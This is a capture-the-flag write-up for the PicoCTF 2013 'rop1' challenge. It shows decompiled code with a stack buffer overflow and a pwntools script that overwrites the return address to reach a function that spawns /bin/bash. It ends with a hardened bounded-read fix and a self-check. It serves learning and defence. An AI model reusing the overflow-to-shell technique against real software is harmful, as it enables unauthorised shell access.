[PicoCTF 2013] rop1
cg10036
2019. 10. 8. 06:14
Decompiled main:

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
    be_nice_to_people();
    vulnerable_function();
    return write(1, "Hello, World\n", 0xDu);
}
```

Decompiled vulnerable_function (the decompiler collapses the 0x88-byte stack buffer to a single char; the read accepts 0x100 bytes):

```c
ssize_t vulnerable_function()
{
    char buf; // [esp+10h] [ebp-88h]
    return read(0, &buf, 0x100u);
}
```

Decompiled not_called:

```c
int not_called()
{
    return system("/bin/bash");
}
```
There is a buffer overflow on buf in vulnerable_function. Overwriting the saved return address with the address of not_called is enough.
ex.py
```python
from pwn import *

e = ELF("./rop1")
p = process("./rop1")

payload = b""
payload += b"A" * (0x88 + 0x4)           # fill buf (at ebp-0x88) and the saved ebp
payload += p32(e.symbols["not_called"])  # overwrite the return address
p.send(payload)
p.interactive()
```
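As an added example (not part of the original writeup), a bounded replacement for vulnerable_function in C, with the frame arithmetic behind the 0x88+4 padding spelled out; the pipe-based self-check and the function names spill_bytes, bounded_read and bounded_read_demo are my own.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Frame layout from the decompilation: buf sits at [ebp-88h], so on 32-bit x86
 * the saved ebp starts 0x88 bytes into buf and the return address 4 bytes after
 * it, which is where the writeup's 0x88+4 padding comes from. The original
 * read(0, &buf, 0x100u) accepts 0x100-0x88 = 0x78 bytes more than buf holds. */
#define BUF_SIZE 0x88u
#define ORIG_READ_LEN 0x100u

/* Bytes a read of readlen into a bufsz-byte buffer can write past its end. */
size_t spill_bytes(size_t bufsz, size_t readlen) {
    return readlen > bufsz ? readlen - bufsz : 0;
}

/* Hardened replacement for vulnerable_function: the read length is derived from
 * the buffer, so no input can reach the saved ebp or the return address.
 * Returns bytes stored (excluding the terminator), or -1 on error. */
ssize_t bounded_read(int fd, char *buf, size_t bufsz) {
    if (bufsz == 0) return -1;
    ssize_t n = read(fd, buf, bufsz - 1);       /* leave room for '\0' */
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Self-check on a pipe instead of stdin (hypothetical helper): feeds a constructed
 * input of ORIG_READ_LEN 'A' bytes, longer than the buffer, and returns how many
 * bytes bounded_read accepted; *leftover receives how many it refused. */
ssize_t bounded_read_demo(size_t *leftover) {
    int fds[2];
    char in[ORIG_READ_LEN], buf[BUF_SIZE], drain[ORIG_READ_LEN];
    memset(in, 'A', sizeof in);
    if (pipe(fds) != 0) return -1;
    if (write(fds[1], in, sizeof in) != (ssize_t)sizeof in) return -1;
    close(fds[1]);
    ssize_t n = bounded_read(fds[0], buf, sizeof buf);
    ssize_t rest = read(fds[0], drain, sizeof drain);  /* what was left unread */
    close(fds[0]);
    if (leftover) *leftover = rest < 0 ? 0 : (size_t)rest;
    return n;
}

size_t bounded_read_demo_leftover(void) {
    size_t left = 0;
    bounded_read_demo(&left);
    return left;
}
```

With a 0x88-byte buffer the hardened read stores at most 0x87 bytes and leaves the remaining 0x79 bytes of a 0x100-byte input unread, so nothing reaches the saved ebp or return address.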